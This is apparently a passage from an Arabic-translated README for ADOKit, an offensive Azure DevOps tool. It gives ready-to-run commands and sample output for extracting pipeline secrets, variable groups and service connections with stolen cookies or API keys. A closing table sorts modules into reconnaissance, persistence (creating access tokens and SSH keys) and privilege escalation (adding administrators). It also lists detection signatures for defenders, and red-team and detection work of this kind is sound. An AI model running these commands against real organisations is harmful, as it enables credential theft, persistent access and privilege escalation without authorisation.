`ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"`
`ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"`
`ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"`
#### مثال الإخراج```
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
استخراج أي مجموعة متغيرات والمتغيرات المقابلة المستخدمة في المشروع (المشاريع)، والتي قد تحتوي على بيانات اعتماد أو معلومات مفيدة أخرى.
قم بتوفير الوحدة getvariablegroups مع /project: لمشروع معين لاستخراج أي مجموعات متغيرات مستخدمة. إذا كنت ترغب في استخراج مجموعات المتغيرات من جميع المشاريع، فحدد all في الوسيطة /project:.
ADOKit.exe getvariablegroups /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getvariablegroups /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getvariablegroups /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getvariablegroups /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:>ADOKit.exe getvariablegroups /credential:"ABC123" /url:https://dev.azure.com/YourOrganization /project:"ADOKit"
================================================== Module: getvariablegroups Auth Type: Cookie Project: ADOKit Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Variable Group Name | Variable Name | Variable Value
real-test-variables | test_password | BurpIsNotBeef
real-test-variables | test_user | nicolas
fake-prod-variables | SUPERSECRET | [HIDDEN]
fake-prod-variables | SUPERNOTSECRET | ThisShouldBeSecured :/
### الحصول على اتصالات الخدمة
#### حالة الاستخدام
> *قم بإدراج أي اتصالات خدمة قيد الاستخدام في المشروع (المشاريع)، مما سيوجه المُشغل إلى أين يحاول إجراء استخراج بيانات الاعتماد لأي اتصالات خدمة قيد الاستخدام.*
#### الصيغة
قم بتوفير الوحدة النمطية `getserviceconnections` مع `/project:` لمشروع معين لإدراج أي اتصالات خدمة قيد الاستخدام. إذا كنت ترغب في إدراج اتصالات الخدمة المستخدمة من جميع المشاريع، فحدد `all` في الوسيطة `/project:`.
`ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"`
`ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"`
`ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"`
`ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"`
#### مثال الإخراج```
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
فيما يلي توقيعات ثابتة للاستخدام المحدد لهذه الأداة في حالتها الافتراضية:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json - يكتشف استخدام ADOKit مع أي حدث قابل للتدقيق (مثل إضافة مستخدم إلى مجموعة)PersistenceTechniqueWithADOKit.json - يكتشف إنشاء رمز PAT أو مفتاح SSH باستخدام ADOKitللحصول على إرشادات حول اكتشاف التقنيات التي تستخدمها الأداة، راجع الورقة البيضاء لـ X-Force Red الورقة البيضاء.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops| سيناريو الهجوم | الوحدة | صلاحيات خاصة؟ | ملاحظات |
|---|
| استطلاع | check | لا | |
| استطلاع | whoami | لا | |
| استطلاع | listorgs | لا | |
| استطلاع | listrepo | لا | |
| استطلاع | searchrepo | لا | |
| استطلاع | listproject | لا | |
| استطلاع | searchproject | لا | |
| استطلاع | searchcode | لا | |
| استطلاع | searchfile | لا | |
| استطلاع | listuser | لا | |
| استطلاع | searchuser | لا | |
| استطلاع | listteam | لا | |
| استطلاع | searchteam | لا | |
| استطلاع | getteammembers | لا | |
| استطلاع | listgroup | لا | |
| استطلاع | searchgroup | لا | |
| استطلاع | getgroupmembers | لا | |
| استطلاع | getpermissions | لا | |
| استطلاع | creds | لا | |
| استطلاع | getbuildlogs | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| استطلاع | listbuildlogs | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| استطلاع | searchbuildlogs | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| ثبات | createpat | لا | |
| ثبات | listpat | لا | |
| ثبات | removepat | لا | |
| ثبات | createsshkey | لا | |
| ثبات | listsshkey | لا | |
| ثبات | removesshkey | لا | |
| تصعيد الامتيازات | addprojectadmin | نعم - Project Administrator, Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removeprojectadmin | نعم - Project Administrator, Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | addbuildadmin | نعم - Project Administrator, Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removebuildadmin | نعم - Project Administrator, Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | addcollectionadmin | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removecollectionadmin | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | addcollectionbuildadmin | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removecollectionbuildadmin | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | addcollectionbuildsvc | نعم - Project Collection Administrator, Project Colection Build Administrators أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removecollectionbuildsvc | نعم - Project Collection Administrator, Project Colection Build Administrators أو Project Collection Service Accounts | |
| تصعيد الامتيازات | addcollectionsvc | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | removecollectionsvc | نعم - Project Collection Administrator أو Project Collection Service Accounts | |
| تصعيد الامتيازات | getpipelinevars | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| تصعيد الامتيازات | getpipelinesecrets | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| تصعيد الامتيازات | getvariablegroups | نعم - Contributors أو Readers أو Build Administrators أو Project Administrators أو Project Team Member أو Project Collection Test Service Accounts أو Project Collection Build Service Accounts أو Project Collection Build Administrators أو Project Collection Service Accounts أو Project Collection Administrators | |
| تصعيد الامتيازات | getserviceconnections | نعم - Project Administrator, Project Collection Administrator أو Project Collection Service Accounts |